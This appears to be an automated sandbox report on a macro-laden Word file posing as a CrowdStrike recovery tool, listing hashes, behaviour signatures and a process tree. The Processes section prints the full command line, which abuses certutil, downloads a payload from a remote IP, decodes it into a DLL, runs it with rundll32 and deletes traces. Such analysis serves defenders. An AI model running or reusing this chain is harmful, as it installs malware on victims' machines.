Analysis
-
max time kernel
107s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
22-07-2024 13:50
Behavioral task
behavioral1
Sample
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Resource
win7-20240704-en
General
-
Target
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
-
Size
302KB
-
MD5
dd2100dfa067caae416b885637adc4ef
-
SHA1
499f8881f4927e7b4a1a0448f62c60741ea6d44b
-
SHA256
803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
-
SHA512
809a6c7a3d83cc9b025a3109778be1d92db509d12202a30ecb31b8c8fbaeae2a50732e36d41b065b10ab64d04990e46173e09e01799bb54f8a93e725e111deda
-
SSDEEP
6144:LkNC0FaiQjxrRbX1o/EUk1DPFVpigBHbP4Z4IU1vmR8:LkNCcC6cf1xVpJNP0QNs8
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2860 2908 cmd.exe 28 -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
xcopy.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid Process 2908 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid Process 2908 WINWORD.EXE 2908 WINWORD.EXE -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid Process procid_target PID 2908 wrote to memory of 2860 2908 WINWORD.EXE 29 PID 2908 wrote to memory of 2860 2908 WINWORD.EXE 29 PID 2908 wrote to memory of 2860 2908 WINWORD.EXE 29 PID 2908 wrote to memory of 2860 2908 WINWORD.EXE 29 PID 2860 wrote to memory of 2980 2860 cmd.exe 32 PID 2860 wrote to memory of 2980 2860 cmd.exe 32 PID 2860 wrote to memory of 2980 2860 cmd.exe 32 PID 2860 wrote to memory of 2980 2860 cmd.exe 32 PID 2860 wrote to memory of 2900 2860 cmd.exe 33 PID 2860 wrote to memory of 2900 2860 cmd.exe 33 PID 2860 wrote to memory of 2900 2860 cmd.exe 33 PID 2860 wrote to memory of 2900 2860 cmd.exe 33 PID 2860 wrote to memory of 2132 2860 cmd.exe 34 PID 2860 wrote to memory of 2132 2860 cmd.exe 34 PID 2860 wrote to memory of 2132 2860 cmd.exe 34 PID 2860 wrote to memory of 2132 2860 cmd.exe 34 PID 2860 wrote to memory of 2732 2860 cmd.exe 35 PID 2860 wrote to memory of 2732 2860 cmd.exe 35 PID 2860 wrote to memory of 2732 2860 cmd.exe 35 PID 2860 wrote to memory of 2732 2860 cmd.exe 35 PID 2860 wrote to memory of 2916 2860 cmd.exe 36 PID 2860 wrote to memory of 2916 2860 cmd.exe 36 PID 2860 wrote to memory of 2916 2860 cmd.exe 36 PID 2860 wrote to memory of 2916 2860 cmd.exe 36 PID 2860 wrote to memory of 2916 2860 cmd.exe 36 PID 2860 wrote to memory of 2916 2860 cmd.exe 36 PID 2860 wrote to memory of 2916 2860 cmd.exe 36 PID 2908 wrote to memory of 2632 2908 WINWORD.EXE 37 PID 2908 wrote to memory of 2632 2908 WINWORD.EXE 37 PID 2908 wrote to memory of 2632 2908 WINWORD.EXE 37 PID 2908 wrote to memory of 2632 2908 WINWORD.EXE 37
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm"1⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\Admin\AppData\Local\Temp & certutil -f -encode C:\Users\Admin\AppData\Local\Temp\curl.exe C:\Users\Admin\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\Admin\AppData\Local\Temp\curl.txt C:\Users\Admin\AppData\Local\Temp\curl.exe & C:\Users\Admin\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\Admin\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\Admin\AppData\Local\Temp\mscorsvc.txt C:\Users\Admin\AppData\Local\Temp\mscorsvc.dll & del C:\Users\Admin\AppData\Local\Temp\curl.exe & del C:\Users\Admin\AppData\Local\Temp\curl.txt & del C:\Users\Admin\AppData\Local\Temp\curl.exe & del C:\Users\Admin\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\Admin\AppData\Local\Temp\mscorsvc.dll,DllMain & exit2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\SysWOW64\xcopy.exexcopy C:\Windows\System32\curl.exe C:\Users\Admin\AppData\Local\Temp3⤵
- Enumerates system info in registry
PID:2980
-
-
C:\Windows\SysWOW64\certutil.execertutil -f -encode C:\Users\Admin\AppData\Local\Temp\curl.exe C:\Users\Admin\AppData\Local\Temp\curl.txt3⤵PID:2900
-
-
C:\Windows\SysWOW64\certutil.execertutil -f -decode C:\Users\Admin\AppData\Local\Temp\curl.txt C:\Users\Admin\AppData\Local\Temp\curl.exe3⤵PID:2132
-
-
C:\Windows\SysWOW64\certutil.execertutil -f -decode C:\Users\Admin\AppData\Local\Temp\mscorsvc.txt C:\Users\Admin\AppData\Local\Temp\mscorsvc.dll3⤵PID:2732
-
-
C:\Windows\SysWOW64\rundll32.exerundll32 C:\Users\Admin\AppData\Local\Temp\mscorsvc.dll,DllMain3⤵PID:2916
-
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2632
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD551a272e2e6d2dab50c616696a9dd3dd2
SHA171f125d252626dd4386f00253ddcb45d8d6e38ff
SHA256ea94f0c81eeb42e5c5239099b14d772b1753833a8e461567ebf5c8173047d0d4
SHA512c99553ddd163cc42914818bc08c9bd8405b6c746f2f3bc36b67aa2f1cb499a634a060d432f45f05b1bc0937253bda74432e9978dfe050fe524fe6a8c9bf46850
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84